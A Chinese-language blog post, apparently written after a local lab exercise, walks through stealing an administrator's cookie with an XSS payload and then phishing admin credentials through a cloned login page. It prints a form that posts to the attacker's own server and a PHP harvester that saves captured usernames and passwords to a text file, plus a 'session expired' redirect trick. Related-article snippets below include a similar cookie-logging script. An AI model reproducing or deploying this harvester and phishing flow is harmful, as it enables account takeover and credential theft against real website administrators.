xss盗取cookie加钓鱼

最新推荐文章于 2024-09-10 16:09:06 发布
最新推荐文章于 2024-09-10 16:09:06 发布
阅读量407 收藏 7
点赞数 5
文章标签: 经验分享 笔记 web安全 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81368488/article/details/136018203
版权

本地搭建一个带有xss漏洞源码 插入js代码简单弹个窗

b541212f79a248eda08eee0570cb11e0.png

ce894d5a12e44099ab1411a89e4d9d1b.png 

在xss平台创建项目

66d3555bd63545178faedbe691c0b93c.png 

将xss平台的payload丢进筐里管理员登陆就可以盗取cookie加登陆

a12f4d5edc734592ab9dcdef2ff1ee14.png 

成功拿到cookie并且利用cookie登陆后台

fd6a6f9f14144e2b8c3b51c10c4a81b6.png 

4c1a193a87a64a4597963d69b427989c.png 

xss钓鱼 

通过伪造登陆页面来诱惑管理员上钩右键下载网页的html1f0b65ea409d47a0b6a00d4b8bdfa4fa.png

 打开html添加from表单

da25731dec4943538393ae813809463c.png

   <form action="http://你服务器的地址/add.php" method="post" id="loginFcaFrom">

这段代码创建了一个POST方法的表单,将用户输入的数据提交到"http://xxxxz/add.php"这个目标URL,并使用ID "loginFcaFrom" 作为表单的唯一标识。

编写add.php来接受输入的密码

<?php
$user = $_POST['admin_name'];
$pwd = $_POST['admin_password'];
$all = "$user \n $pwd";
$f = fopen("context.txt",'w');
fwrite($f,"admin_name:$user \n admin_possword:$pwd");
?>

<?php
// 从POST请求中获取管理员用户名和密码
$user = $_POST['admin_name'];
$pwd = $_POST['admin_password'];

// 将用户名和密码拼接成字符串
$all = "$user \n $pwd";

// 打开名为"context.txt"的文件,以写入模式
$f = fopen("context.txt", 'w');

// 向context.txt中写入管理员用户名和密码信息
fwrite($f, "admin_name:$user \n admin_password:$pwd");
?>

现在只需要在自己服务器搭建这个项目 然后利用xss在那登陆后台之后伪造登陆已过期 然后点击跳转到我们的钓鱼页面就可以了

2e502b32d7724f7fa9594589aaf8305d.png

xss平台创建此项目 放进刚刚的筐里提交

1b061004a6e9434ba1916df13dad0f59.png 

我们模拟管理员登陆到后台然后就自动提示登陆过期 点击一下就跳转到我们的钓鱼页面

ee8be0c347f34809975e039c20ac73aa.png

 

8797f475bf9f477d8bb01b0349d3b5d4.png 

 我们输入账号密码后我们的txt就自动接收到了账号密码

a567bd9231e441508c03aca2ef4007b1.png

管理员的账号密码就可以被我们钓出来了

 

本文比较简单 大佬轻点喷可以加qq联系3661629617

kenny323
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全XSSCookie外带攻击姿势及例题详析
等风来
05-19 7200
XSSCookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而窃取用户的 Cookie 信息。攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并将受害者的 Cookie 数据上传到攻击者控制的服务器上,然后攻击者就可以使用该 Cookie 来冒充受害者,执行一些恶意操作,例如盗取用户的账户信息、发起钓鱼攻击等。
利用XSS窃取用户Cookie
Monsterlz123的博客
07-20 7260
XSS】利用XSS窃取用户Cookie Hello,各位小伙伴周六愉快。 晃眼之间一周又快要过去了,时间是不等人滴~~ 这周准备连发三篇XSS相关内容,两篇实战,一篇总结。 然后XSS漏洞部分就暂时完结啦~~ 今天我们来看看怎么利用XSS窃取用户cookie吧。 一、实验概述 实验拓扑: XSS的用途之一就是窃取用户的cookie,攻击者利用XSS在网站中插入恶意脚本,一旦用户访问该网页...
黑客是怎么cookie获取?钓鱼?键盘记录?
jklbnm12的博客
04-13 1086
xss后台的搭建 1 打开pikachu找到管理工具xss后台 2 点击xss后台看到下面的界面就是成功了 3 进行登录页面,登录进去即可。 XSS案例:盗取Cookie 实验机器 攻击者127.0.0.1:88 受害者127.0.0.1:88 漏洞服务器127.0.0.1:88 攻击流程 修改C:\xampp\htdocs\pkxss\xcookie下的cookie.php,将IP地址改为漏洞服务器的地址(这里注意一下因为xss后台是可以单独拿出来运行的后台,所以我将pkxss后台文件从pikac
简析小黑是如何盗取cookie登录用户账号
dodoing的博客
05-21 1841
都说cookie安全,现在通过一个很简单的例子来说明它为什么不安全。 对于cookie的概念这里就不做阐述了。前端截取cookie的方式有多种,下面介绍一种比较简单的手法。 首先: 小黑会在各种网站发布帖子,然后在某些特定的地方添吸引人点击的内容,而该内容会有一些超链接。比如在A网站,小黑在发布的内容中个超链接: <a href=”JS_URL” target=”_blan...
利用XSS盗取cookie并登录
qq_44111753的博客
08-01 3731
利用XSS盗取cookie并登录(DVWA) 1、发现xss漏洞 输入构造js代码 有弹出框,存在xss漏洞 2、盗取cookie xss漏洞框架创建项目,一直点下一步,在选择攻击模块时,选择“默认模块”,并勾选keepsession,即保持连接,刷新cookie,保持cookie的时效性,否则没有及时查看,cookie很可能过期失效了 在含xss漏洞的地方插入以上标记任一代码 点击项目查看得到cookie 3、利用cookie登录 利用开发者工具在箭头处填入获取的cookie 刷新网站,无需输入
存储型xss盗取cookie实验
weixin_34130389的博客
04-18 529
声明:仅供交流使用,严禁违法犯罪,否则后果自负1,准备接收cookie的环境:ip为172.24.10.105代码为:保存为getCookie.php<?php $cookie=$_GET['cookie']; $log=fopen("cookie.txt","w"); fwrite($log,$cookie."\n"); fclose($log...
利用xsscookie教学
cnbird's blog
06-24 4585
使用的工具: 1.免费网页支援PHP 2.存在xss的脆弱的网站。 vb.php为存放cookie的网页 PHP Code:Cookies Stealther - Designed and programmed by R00t[ATI]or="#C0C0C0">COOKIES STEALTHERBy R00T[AT
xss漏洞测试(cookie的窃取和利用,钓鱼,键盘记录)
qq_43814486的博客
05-03 4017
cookie的窃取和利用
XSS解析——pikachu靶场
Aquarius_ego的博客
05-10 1190
XSS讲解——用pikachu靶场复现xss的四种危害:劫持用户cookie、框架钓鱼、挂马、键盘记录
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 013-网络安全应急技术与实践(Web层-XSS钓鱼攻击)
热门推荐
时光隧道
02-10 7万+
XSS(跨站脚本)是一种常见的网络攻击技术,攻击者通过在受害者的网页中注入恶意脚本,来获取用户的敏感信息或执行恶意操作。因此,XSS高级钓鱼指的是通过XSS攻击手段来进行钓鱼行为,即通过在网页中注入恶意代码,并伪装成合法的网站或登录页面,从而诱使用户输入敏感信息。
获取cookie的简单方法(电脑端)
A_991128a的博客
03-06 3370
首先科普一下Cookie是什么百度搜索的官方解释如下:Cookie,有时也用其复数形式Cookies。类型为“小型文本文件”,是某些网站为了辨别用户身份,进行Session跟踪而储存在用户本地终端上的数据(通常经过密),由用户客户端计算机暂时或永久保存的信息。简单来说就是一个辨别用户身份的信息。一个 Web 站点可能会为每一个访问者产生一个唯一的ID, 然后以 Cookie文件的形式保存在每个用户的机器上,由于确认身份。
渗透测试-跨站脚本攻击xss之获取cookie
lza20001103的博客
04-24 4903
渗透测试-跨站脚本攻击xss之获取cookie
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 4327
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
盗用cookie的目的和防盗cookie的手段
ITWANGBOIT的博客
10-27 1万+
前提 虽然通过使用springsecurity我们防御了会话固定攻击,但是如果黑客等待合法用户登录系统之后,再从合法用户浏览器中拿到名字为JSESSIONID的cookie,然后放入黑客自己的浏览器的cookie中,这样以来当黑客带着盗窃来的JSESSIONID访问系统时,后端系统会根据JSESSIONID找到对应的session,就会把该次请求当成是认证通过的用户发送的请求;这样黑客就可以为所欲为了。 实践 如下图: 经过上图的实践,证明我的分析是合理的,只要能拿到认证通过的用户的cook
简单的cookie盗取
weixin_30940783的博客
02-25 763
此文需要有一定的javascript\html\php方面的只是作为基础 直接上代码: #用于抓取盗窃来的cookie的php文件,此文件需置于攻击者的服务器上,这里包含了两种写法:Method1和Method2 #保存为getCookie.php <?php #Method 1 // $info=getenv("QUERY_STRING"); // if ($...
网络安全实验6 认识XSS & 盗取cookie
一半西瓜的博客
01-30 3970
赞赏码 & 联系方式 & 个人闲话 【实验名称】认识XSS&盗取cookie 【实验目的】 1.了解XSS漏洞 2. 掌握盗取Cookie方法 【实验原理】 1.什么是XSS XSS又叫CSS (Cross Site Script) 也称为跨站,它是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML...
物联网云平台开发岗位面试经验分享
王中阳的博客
09-10 913
本次面试针对物联网云平台开发工程师岗位,涵盖了自我介绍、项目难点解决、技术细节如Redis分布式锁、设备控制率、MQTT鉴权流程、APP连接MQTT、权限控制等多个方面。强调了高并发、高可用设计及云服务权限管理的重要性,并讨论了内存泄漏、数据库死锁等技术问题。
STM32学习笔记(二、初识stm32单片机)
最新发布
tommorrowwill的博客
09-10 685
首先stm32是意法半导体公司(ST)使用ARM公司的Cortex-M为核心生产的32位的单片机。其中,ST---意法半导体公司,即SOC厂商。M---为Microelectronics的缩写,即微型处理器。32---表示控制器为32位的。103---表示F系列的子系列。
【C++学习笔记】数组与指针(三)
qq_38196449的博客
09-09 1148
0(空字符)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值